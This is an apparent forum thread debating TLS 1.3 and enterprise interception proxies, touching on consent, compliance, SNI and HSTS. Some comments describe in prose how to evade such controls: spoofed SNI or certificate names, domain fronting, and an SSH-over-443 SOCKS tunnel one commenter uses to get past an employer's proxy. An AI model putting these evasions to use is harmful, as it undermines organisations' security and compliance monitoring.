There is a difference between an unauthorized party intercepting TLS communication, and a party you have authorized to do so.
Let's say I am a private person and am trying to access my bank account through a TLS connection. I am connected via WiFi to my cafe. I have not authorized the cafe, its uplink provider, nor any of the other network operators between me and the bank to intercept my traffic. It should be impossible to do so.
Let's say I am employee of a financial institution. This company, in order to adhere with record-keeping laws, needs to log all network connections. One of the conditions of my employment is that I authorize the company to intercept my network communications. The proxies within my company should be able to intercept my communications. However, no network operator outside of the company for which I work for and to which I have given consent to intercept my traffic, should be able to intercept the communications.
The real world presents situations that are more nuanced than "encrypt everything and don't let anyone between me and the destination to see what is going on." There are many places where the above is the desired and sensible requirement. There are also many use cases where crypto is warranted, but select parties should have the ability to break it.
How this should happen is to be seen. In the examples I have given above, "consent" will have to come both in the idea of consent, as well as some crypto key that will allow the privileged proxies to intercept my traffic.
What TLS 1.3 does appear to do is make it harder to optimize this proxying, and make it impossible to be selective about what you proxy.
However, both such optimizations and selective proxying are apparently hard to implement securely.
Now, selective proxying is nice to have.
It is better if enterprises don't intercept traffic to banks or social networks. However, it seems to me like facebook would be a nice side-channel for exfiltrating data.
It seems to me that selective proxying could still be solved at the DNS level. Make any domain except for the whitelisted ones resolve to a proxy, and the have the proxy in between all traffic.
This means you also proxy all unencrypted traffic to the outside world, but if you are proxying TLS, you probably want to block or proxy plaintext outbound connections as well.
You have the ServerNameIndication (SNI) in the ClientHello, so selective proxying is very easy to implement with TLS 1.3. SNI wasn't mandatory in older versions, which is why middleboxes went for this "let's inspect the certificate" dance in the first place.
Thus, a proxy using SNI to identify the host would be circumvented by using facebook.com or www.bankofamerica.com as the name in SNI and just ignoring SNI at the malicious endpoint.
As TLS 1.3 encrypts the certificate, you can't check the certificate without actually MitMing the connection. Thus, whitelisting isn't possible in TLS 1.3. Unless you trust the (attacker controlled) SNI, at which point, why even do TLS proxying.
Note that according to the article, many TLS 1.2 proxies don't actually verify the certificate by default, which means my masquerade as facebook.com ploy would also work against them. This can be done by simply using a false 'common name' field in the cert.
The defense against this is easy, it is the certificate validation all browsers do. Apparently, these middle boxes by default do not use this validation.
This is generally seen as a compelling argument against the deployment of TLS proxies. The argument being that they are 'security theater' as opposed to actual security, on account of them being easy to spoof.
There is a simpler solution to let users still access the Web: let them do so unencrypted. They won't have the "Secure" symbol on their browser, which is extremely reasonable considering that, indeed, their access is not really secure: their employer can read all communications.
The employer simply sets up a proxy that receives unencrypted communications and encrypts them on the fly; a TLS/HTTP client.
The bigger issue is HSTS; the proxy can remove the header, but if the origin comes preloaded in the browser, that won't do, which means the browser would need to be customized to not have or enforce HSTS.
This needs to be reconciled with the conflicting requirement to log, record, and or block connections based on content.
Perhaps TLS 1.3 is not the solution here, as it can not reconcile this conflict. Perhaps something else needs to be developed that will provide a solution that meets these two requirements.
Furthermore, as most large companies install these, won't malware authors just start proxying C&C traffic over ssh on port 80? Or use other non-interceptable secure channels?
I thought most of these compliance frameworks don't really specify how, just compile, archive and produce the data periodically (or on demand). And make the system tamper-proof (or tamper-evident), and get it audited from time to time.
If there is something to reconcile, the bug is in the law and should be fixed there.
Failure to do so will get you heavily fined and get your license revoked to do business. Also, you can't talk about it to the public.
I have friends and family in at least three countries who are involved in this industry and have confirmed me that this is a routine process, log sharing, port-mirroring, putting black-boxes in the middle of your core network is just routine work and has been the case for many years.
Perhaps such countries will outlaw TLS 1.3. Who knows. The US did outlaw strong encryption at one point because it didn't allow it access to data it wanted to have access to.
Does that mean they also need to intercept communications from your phone to the internet when you're at work?
So one institution has law requirements that break users' rights so we must change the internet for them
In this sense, corporate users truly are different from private users. Similarly, company e-mail is not confidential. A very important requirement to this treatment of corporate users is that the end user ought to be made aware of this. Both with the company e-mail and the proxied company computer.
Part of the issue here is that sometimes encryption is bad. I for one dread the day I'll have to install some binary blob that communicates using TLS with a pinned cert I cannot override.
Similarly, encryption and secure hardware modules are what enable boot-locked devices.
The point being, cryptography can be used to take away control. Not just from big institutions but also from end users.
If we admit that sometimes cryptography is bad, there might be cases where we want a controlled way to break it. Again, this should be done with notice and all responsibilities lying with those taking the risk. That is, the party responsible for securing the proxy is also the party that is screwed when the proxy is compromised.
This might sound like encouraging key-escrow for government acces. It definitely does not. The issue there is notice (or choice, if non-escrow becomes outlawed) and the fact that a compromised system hurts end users, not the government. Thus, the incentives are misaligned for the government.
I'm not sure I follow, so because HSTS is a disaster then encryption is bad and we should switch to no encryption?
Then, I propose we should also take issue with encryption that prevents TLS proxying in corporate settings.
In these institutions just block TLS 1.3 connections in the firewall. Where is the problem?
TLS and encryption arent going anywhere and theyre not always going to wait around for a concensus from industry. The sobering truth is that if not now, than in a decade or so the companies shilling TLS/SSL interception appliances and software will need to shift focus as the protocol will likely have been evolved by force over time to meet the needs of increasingly prevalent surveillance states. TLS interception or "proxying" started out as a graduate students parlour trick and eventually evolved into an entire shady industry where players like Bluecoat are routinely caught selling their products and services to repressive regimes.
Heres hoping LibreSSL delivers the goods with or without the marketing teams say.
Frankly, I have a higher duty than user privacy. My users have access to data that's critically sensitive in various ways, in some cases they face criminal sanction. I need to both control and detect unauthorized software on the network and ensure that users are following the rules.
More extreme privacy activists will make noises about things using endpoint based solutions or something similar. It's a bullshit position that will ultimately weaken security.
In the latter case ideally (and possibly legally required) you'd have acceptance of potential interception a condition of employment.
And that's the thing. There is nothing stopping those companies from analyzing the data once it reached a managed computer. It is just that they want the capacity to do that on computers they don't manage.
You cannot get out of the network unless the traffic is proxied. There are a few exceptions for identify based reverse proxies that companies like Google talk about. But most places aren't there yet for sensitive applications outside of collaboration.
There's also the matter of trust. Some business partners are explicitly trusted, either by a private CA signed certificate or by a specific third party key that is independently validated.
Public networks are completely different. I am not talking about an ISP here.
That said, your use-case of intercepting secure connections in your private network is a solved one: set up a private CA.
Wanting to weaken the security of TLS for everyone else for what amounts to your own convenience is very selfish.
Unfortunately (?) some companies are actively working against IT administrators (and in my case, parents) ability to inspect TLS traffic on their networks - Google being a big one with the recent release of Android Nougat requiring apps to opt-in to allowing user/admin installed CA's to be honored. User privacy is important, but if you're using a company-issued phone or allow their MDM to deploy a CA to the trust store on your own phone you should know what you are signing up for. Google Chrome pins the certificates for google-owned sites as well, so even if your private CA is installed in the system trust store it will flat out refuse to load google.com, etc.
Whitelist would be safer, but it’s not worth the headache - we use blacklisting to try and prevent accidents for brief periods when we can’t supervise her access instead of falsely thinking it eliminates the need for supervision entirely.
Regardless, still need TLS inspection either way - even pbskids.org is served over HTTPS these days.
Sounds like it could be a worthy venture. Make this software running on dd-wrt or whatever, then sell people wifi-routers with this preloaded so that they can just plug it to their existing routers with ethernet, and voila they have a kid-friendly separate wifi.
I could, but it's a lot more work than just installing Sophos XG on a used server and enabling filtering for certain users. I could also show my wife how to use the admin interface and add additional sites to the whitelist, but there's still the issue of CDN's and such that make life difficult.
> Sounds like it could be a worthy venture. Make this software running on dd-wrt or whatever, then sell people wifi-routers with this preloaded so that they can just plug it to their existing routers with ethernet, and voila they have a kid-friendly separate wifi.
Some companies already sell content filtering devices that sit somewhere on your home network, I'm not a fan of them because they usually require you install some client on your devices or use a captive portal for authentication. Some also have a monthly/annual subscription or those that don't I worry how they even afford to keep the list up to date once they get out of growth stage (or I'm out $$$ for the hardware if they fail to exit it at all).
I realize my setup at home isn't for your average user, but one huge advantage I have that nets it a high Wife/Spouse Acceptance Factor is authentication to my firewall is done through RADIUS accounting packets and I already have AD deployed at home. The moment you login to my network the wireless access point or switch (if wired connection) tells the firewall what user is assigned to a specific IP address, so my wife just signs in with her AD credentials on her iPhone/surface pro/etc. and the firewall already knows to let all her traffic through, if my daughter signs in on her computer/iPhone (she has my old 6+ to play games on) traffic is immediately filtered.
Also, do you know of any way to filter YouTube (other than outright blocking it)? E.g. only allowing content from a whitelist of channels? YouTube Kids isn't really effective, unfortunately.
A root CA that has been installed by the computer administrator is assumed to be more trustworthy than the one installed by your OS.
I've worked in these places and I won't work for them. It places trust in my employer and other employees (most of which I will never meet) that I'm not willing to give. Sure you can tell me that certain sites aren't intercepted, and I can tell that from the origin of a certificate, but many employees can't and don't understand any of this.
If your data is really so secure setup an airgap. There are other ways to securing a corporate network that don't involve a 'just in case' dragnet.
Ditto, but my solution is to just not login into any important/private/nonpublic stuff on employer networks. There's plenty of other non-proxy stuff an employer can install that I also don't trust, and won't necessarily detect, that this seems like a good general policy - irrespective of my employer/coworkers. And if I'm going to be taking that "assume I have no privacy" security stance anyways... them being up front about one of the technologies they're using to secure stuff is, if anything, a good sign.
I've got a non-MITMed cellular connection on my own hardware in my pocket if I'm really hard up for a private connection. I do draw a line at the point where anyone wants to install anything on my own devices. I've temporarily allowed it exactly once - with the device not leaving my sight, and with it being reformatted by myself both before joining it to the work network, and then again before joining it to my home network (although given the potential for firmware malware / IME type stuff, perhaps that's still not cautious enough.)
> If your data is really so secure setup an airgap.
Been there. And I'm paranoid enough to be half tempted to set one up at home. They're a PITA for some workflows though - e.g. needing to play a game of telephone for SDK updates. And then you still can't browse Facebook or whatever with your corporate network. Intercepting traffic instead of completely blocking it is a convenience/security tradeoff.
> but many employees can't and don't understand any of this.
This is admittedly a problem. And they still won't even when the IT department says "we've basically installed our own malware onto 'your' computers / our network, maybe don't log into your bank account from work, we're already going to be feeling terrible and losing sleep if/when our security appliance gets pwned."
So maybe it'd be a good idea ethically and exposure-wise to block facebook/google services/banks if you're going to MITM despite potentially pissing off those who are fine with trusting their employers/coworkers. But I'm relatively OK with a well communicated and disclosed TLS proxy for work networks.
And on that basis, you're prepared to throw such a tantrum as to hold up completion and adoption of a crucial cornerstone of protection for people who actually need privacy?
Interception of web traffic stops those threats.
Nobody is throwing a tantrum or compromising a cornerstone of security. You don't really understand the full scope of what you are talking about -- the "cornerstone of privacy" you speak of is really placing ultimately trust in every random web service.
TLS and the root trust problems associated with it are bad enough. Preventing users from making choices about who and what they trust makes those problems dramatically worse.
No, but you stop that by refusing to let the printer talk out of your network at all.
> Or notes used by a police investigator while researching a unsubstantiated or even false accusation leaking thanks to some drive by malware?
That's where on-host monitoring can protect you. It'll also protect you in case that computer can ever connect to any other network.
That's a lost battle, honestly. If you block traffic from the printer to the internet, it starts sending UDP with faked source addresses.
If you deploy a VLAN the printer can fake the VLAN Tags. If you physically seperate the printer from any direct connection to your firewall, the printer can look for anything on the network it can use to bounce traffic from (like a DNS server or a computer accepting ICMP echo requests)
A sufficiently dedicated attacker can and will extract information through covert channels.
Whatever happens with TLS1.3, obviously the looming idiocy of the CA system is a larger problem. And yes, you're right, trusting random web services (ie, the other endpoint) is often a mistake.
But at the end of the day, the users that need to be served by TLS are the endpoints, not the proxy operators.
(FWIW, I suspect that TLS as we know it will shift fairly radically anyway as distributed applications become more prominent).
Do you ever go through your proxy logs and when was the last time you actually found something suspicious?
Even very sophisticated large tech companies don't epoxy their USB ports on their employee macbooks.
// EDIT: They also cover their asses with some 'network use policy' that is the vaguest possible thing and which even most software engineers don't understand the full extent of what is done. It's pretty disgusting, and I can't wait until some combination of GDPR style informed consent and what is law in austria is put into employment law.
Place I work does this - and it's a constant PITA that gets in the way of me doing my job. But I think if you have a system to put exceptions in place, and it doesn't take 47 weeks of email ping ping with 18 different managers, then it's fine.
Unfortunately, where I work is a beurocratic nightmare.
But it's easily gotten around - I have a cloud-hosted VM (paid for by company MSDN!) that runs SSH on port 443 - so the HTTP proxy will let me through to setup a tunnel through which I can access anything using SOCKS.
I think assuming you can control any packets that pass through a network ends up being a losing proposition. Why not use things like VPNs to ensure that traffic to sensitive internal services is controlled? Failing that, install software on users computers and don’t allow them to use any non-work internet resources.
That's all well and good, but you don't need to do it from your desk at a regulated financial institution.
>I think assuming you can control any packets that pass through a network ends up being a losing proposition.
This is a very strange statement. All security is always a losing proposition. The best anyone can ever hope for is raising the bar of cost and sophistication an attacker will have to surmount to be successful, but you're still very much obligated (legally, and ethically) to do that. If you possess sensitive data, you need to take steps to detect and prevent exfiltration. If you have employees (such as registered broker-dealers) whose conversations with the outside must be monitored and retained under the law, you need to make sure they're using only the properly configured communication channels.
>Why not use things like VPNs to ensure that traffic to sensitive internal services is controlled
Because TLS interception is about preventing unwanted egress/exfiltration from the (relatively) trusted zone of a corporate network.
>Failing that, install software on users computers and don’t allow them to use any non-work internet resources.
Installing the corporate CA on managed endpoints is a prerequisite for TLS interception. The problem VPNs solve has nothing to do with this.
Just ask the users of your network to install your CA cert (or click past your cert warnings). That should work with TLS 1.3 right?
Or in your statement are you really meaning, "I should absolutely be able to intercept TLS traffic on my computers on my network without them knowing about it"? If so, that's a completely different thing altogether and if that's what you and the GCHQ mean when talking about proxying, it needs to be explicitly stated. There is a huge difference.
Perhaps the security agencies view their country as "my network", and then if you read the rest of the quote, everything follows from there.
There are big differences: The compulsive power of government, and the necessity of civil rights and peacefully organizing against the government; compared with the 'at will' relationship with a company and its interest, generally considered legitimate, in ultimate authority and stopping insubordination.
On the other hand, large companies are not really 'at will'; people can't just walk away from jobs 'at will', especially when they have children, mortgages, other debts, or (in the U.S.) health problems. Also, some insubordination is legitimate: Labor organizing, legal and regulatory complaints (EEOC, safety, etc.), and probably other things I'm not thinking of.
The distinction isn't so clear cut. I'm not sure the objection of the corporate sysadmin is that much more valid than the government security agency. Also, the security agency often has far more at stake.
Intercept the traffic on your machines, if that's a legal requirement.
Intercepting that data would be an HIPAA violation, how do you avoid that?
So feel free to have insecure communication provided you control all devices on the network. It will still be insecure.
I definitely do not want to see a weaker TLS - 1.3 is great. At the same time, I do not want to have 'security improvements' that make it impossible for average developers to see their own device's traffic. That will ultimately enable insecure APIs and gross privacy violations behind TLS.
If you've lost that control you have nobody to blame but yourself. There are devices and operating systems on the market that do not require you to give up that control. If you choose to buy a device you can't root and an OS you can't modify, that's all on you.
This is where Libre/Open Source software comes in and why it plays a vital role in creating an ethical connection between people and softwares. There is literally no other way around this. Open code, secure transmission, harsh accountability on violations.
If you don't actually control the box, it can do whatever it pleases. It doesn't need an IETF Standards Track RFC, it can just choose to do it and you can't stop it.
Especially when it goes as far as encoding the philosophy that state actors are the only problem that matters into the very protocol.
Are you saying the protocol will be easier or harder to intercept in the future?
Open lobbying against crypto from the spooks, in the name of collective security, is of course not a new thing - but dressing it as necessary for "enterprise security" in standards lobbying is a clever move.
But what bothers me, is I keep asking myself the question: When and why did we decide to give the proxy all the power in this relationship?
If we have to use proxies, at least the proxy should be transparent about itself to all parties on the connection. Then my bank can drop the connection or restrict functions/data to non-proxied data, secure government servers can drop the connection, my browser can drop the connection and give me an error (because I don't want anyone snooping on my banking history), etc.
Eg. Let's say I open the patient portal for my hospital through a proxy. Is the proxy software HIPAA compliant? What about the people that have access to my health data through the proxy software? In this case, I would think we should allow the portal software to drop the connection because the connection itself is not secure.
It sounds like what you want is the server authenticating the client. That already exists in TLS: it's called a client certificate (complementing the usual server certificate, which authenticates the server to the client).
Unless the MITM proxy has access to the client certificate's private key, or the server trusts the MITM proxy's CA, the proxy cannot impersonate the client.
I doubt it. AFAIK the web browsers’ UI for handling client certificates is way too cumbersome for mainstream usage.
In TLS 1.2 you could only express a list of CAs whose signatures you trust (this is one of the most widely misconfigured settings in OpenSSL-based software, telling OpenSSL you _trust_ some CA to identify clients when actually you meant to say your server certificate is _signed_ by that CA)
In TLS 1.3 you can write out arbitrary constraints, although somebody will need to define any new ones in a separate ID or RFC. So this might simplify the end user experience down the road because the browser can do enough matching to just hand over the correct certificate automatically.
Or it might never get used on the public Internet, oh well.
If the server detects an insecure connection, then at least the minimum is that the user is informed.
It's more important to have good viable security rather than "my middleboxes". To me, it's like the FBI asking for NOBUS crypto.
The Internet is nothing special in this respect, large companies struggle to make policies that cover all the bases without strangling themselves and they will err on both sides of the line, sometimes learning from their mistakes and sometimes not so much.
Lots of corporate networks probably should be locked down to that extent. If they can't set up their own CA they're probably not doing a great job protecting their customers' private information.
How do you think Google found out Levandowski was stealing blueprints? Definitely not by meddling between TLS endpoints.
It would be really helpful, though, if there were an operating mode wherein one could instruct the proxy to talk to an HTTPS server without using CONNECT. So the browser talks to the proxy over TLS, and displays the proxy's certificate details, possibly with a big red warning, and the proxy terminates that TLS connection, decides what to do based on the request, makes a new onwards connection and gets the response plaintext too.
The user obviously loses some privacy guarantees here, but no more than with an intercepting "transparent" proxy, and it's much clearer what's actually happening and which devices the user needs to trust. I'm much happier with an explicit proxy than any attempts at a transparent proxy that I've encountered, not least because it makes it possible for the browser to be clear to the user about what's happening.
[SNI is there to make "virtual hosting" possible for HTTPS, which is why you can get working SSL on a cheap bulk host without paying them extra for a dedicated IP address]
So, a middlebox might choose to drop connections based on the name your client sends (and of course it could also choose to drop them based on the destination IP address, the amount of traffic you've sent recently, or the phase of the moon). But the certificate itself is now always encrypted, so the middlebox can't snoop that without acting as a proxy.
It sounds as though you've (perhaps against your will) accepted the proxy, so in that case all bets are off anyway, a proxy can do whatever it likes, if you don't want that don't trust proxies.
AIUI, it's slightly better than this, because you only actually need to send the name of some domain that the server can serve, not necessarily the one you actually want to talk to. If the domain is on Cloudfront, App Engine, Heroku, etc, that means you can choose one of a billion innocuous sites to use for SNI, before connecting to the one you actually want.
This is called 'domain fronting':
I can't quite work out the trust algebra of this, though. You don't have any cryptographic guarantee that you're connecting to the right site. But you can be sure that you're connecting to whichever server hosts the site whose name you're taking in vain. But if that server was able to serve your site all along, because it had its private key, did you ever really have any guarantee?
Probably won't help for wikipedia, though, as they're not behind a CDN.
Is the client allowed to not send an SNI? If not, does this mean that HTTPS servers will no longer have a "default" HTTPS virtual host if accepting only TLSv1.3 connections?
If you don't get to know anything about the backend at an IP until you've essentially proven you have a shared secret (the domain name), this could be a bad time for the folks who try to scan IP address space for HTTPS sites (e.g. the DDoSers who want to de-anonymize Cloudflare-protected backends in order to attack them directly.)
Anyway, it is unlikely that TLS 1.3 will be popular enough to reject TLS 1.2 connections in the next say, five years unless there's some monumental security problem that makes TLS 1.2 moot.
Of course it's usually even simpler than that because you can just look at DNS lookups which overwhelmingly don't use transport-level encryption today.
The DNS community is now trying to move to DNS over TLS. Once that is wide spread, there is hope that a future TLS version will encrypt SNI.
Note that if you do DH before sending the SNI then it requires an active attack to figure out the SNI. However that will make life very difficult for server-side proxies that try to route traffic based on SNI.
TLS 1.3 provides 1RTT encryption by having clients speculate that the server is modern. The client opens by saying "OK, I assume you know how to do this key exchange and here are my parameters". If the server actually does _not_ know the flavour of key exchange proposed, it sends a retry message, explaining what it does know instead and we're immediately paying an extra round trip cost.
SNI travels in that first message from the client, but if we are to encrypt it with the DH key we can't send it until the client knows that key, which means we again pay an extra round trip.
You might think hold on, surely we can immediately start our transaction because we have the encryption keys now, so we're not paying an extra round trip. Nope, we mustn't start the transaction until we've seen the server's certificate, so we have to wait an entire extra round trip.
The best option if we want to really encrypt SNI is to have servers able to choose to go early, so you'd connect without SNI, and then after finishing DH the server could choose to either immediately send certificates (so it can't serve different sites this way) or ask for the encrypted SNI first. This would mean it's 1RTT for www.google.com and 2RTT for another-cat-blog.example because the latter is on a cheap bulk host. That's... not great.
A way forward that's resistant to attack but isn't full encryption would be use of hashing, the client specifies only a hash of the hostname, not the plain name, and the server matches this against its known list of possible names. A snooper sees the hash, and can try to guess what it means, but if they have no idea they're out of luck.
We can make the snooper's life hard either in the protocol design itself (e.g. send password-style salted & pessimised hashes, so both the server and snoopers must recalculate for each connection) or in our naming (e.g. name the members only web site zqdm-48gb.example.com, not members.example.com) but this is far less comprehensive than full encryption.
It is nice to have 1RTT, but if at the same time you are leaking SNI, people are not going to be happy.
I'm curious how this hashing would work out. My gut feeling is that some security researcher will have a nice presentation along the line of 'nice hash function you have, here's how to break it'.
* It is common to pin a certificate for which you don't have the corresponding private key, and so you would not be able to decrypt the message. Examples: Pinning an intermediate from a CA you use, or their root, pinning a "backup" that you have on paper just in case but isn't live
* Pinning is a serious foot gun and a hostage risk (bad guys take over your site for one day, it seems normal but pins _their_ key, then they tell you to pay them $1M for the key or else, your users are locked out until you pay), so it is being deprecated for the public Web.
* Which key? The whole point of SNI is that we tell the remote server which site we're interested in, and then it chooses the keys and certificate accordingly. So with your approach the server must use trial-and-error to eliminate all the keys that don't work first, it barely matters what's actually inside the SNI message, if you can decrypt it then you've already found the right site...
Sure, most servers won't be able to take advantage of this. But if your server is using TLS only to speak to your reverse-proxy over the public Internet (e.g. if you're operating a Cloudflare-protected site where the TLS is terminated at Cloudflare and then a separate TLS connection is made from Cloudflare to your backend), you might be able to take full advantage of this as soon as your reverse-proxy's client logic supports TLSv1.3.
At least for those that are stuck on IPv4, which is unfortunately a majority.
And best part is when Russians were blocking a blogger's web site based on IP he switched his IP to a bank's web site and thus the bank's IP was blocked automatically :)
To clarify: the blogger set his domain to point to the bank's IP address. The automated domain blocking system resolved his domain and blocked "its IP" without confirming that the IP actually belonged to the targeted site.
"The heuristics are necessarily imprecise because TLS extensions can change anything about a connection after the ClientHello and some additions to TLS have memorably broken them, leading to confused proxies cutting enterprises off from the internet."
Can someone elaborate on a specific instance of this where a TLS extension lead to breakage? I don't doubt the author, quite the opposite - I'm interested in reading more about the specifics of it.
I have no actionable feedback from the parallels, just fascination.
TLS 1.3 client libraries could then optionally support interceptable key exchange depending on who is using them. An individual can use normal OS and distro that exclude the insecure features while banks and military facilities might turn it on.
Alternatively,why the "one size fits all" approach? Why not have a "TLS-commercial". Obviously the "one size fits all" requires a comptomise by all parties resulting in a collective reduction of security.
That sounds like the "draft-rehired" proposal. Here's a list of arguments against it (and similar proposals): https://github.com/sftcd/tinfoil
By ensuring that HTTPS is used everywhere, and that no other security regimes are allowed, they've killed proxies for all uses except spying on users. The end result is some of the Internet is now less private, by design.
If you think proxies are a useful tool to save bandwidth, decrease latency and reduce load, and want to stay secure, but not necessarily private, there are very obvious ways this can be done. But there are people literally fighting against this because they want privacy or nothing.
This is Internet puritanism.
There is plenty of client software that can be configured to use proxies. Also no problem there.
Where it goes wrong is transparent proxies (also called 'middleboxes') that operate without consent of the endpoints. In general, those proxies have caused so many network problems that most people involved in the IETF will happily see them die.
And the easiest way to do that is to encrypt all traffic.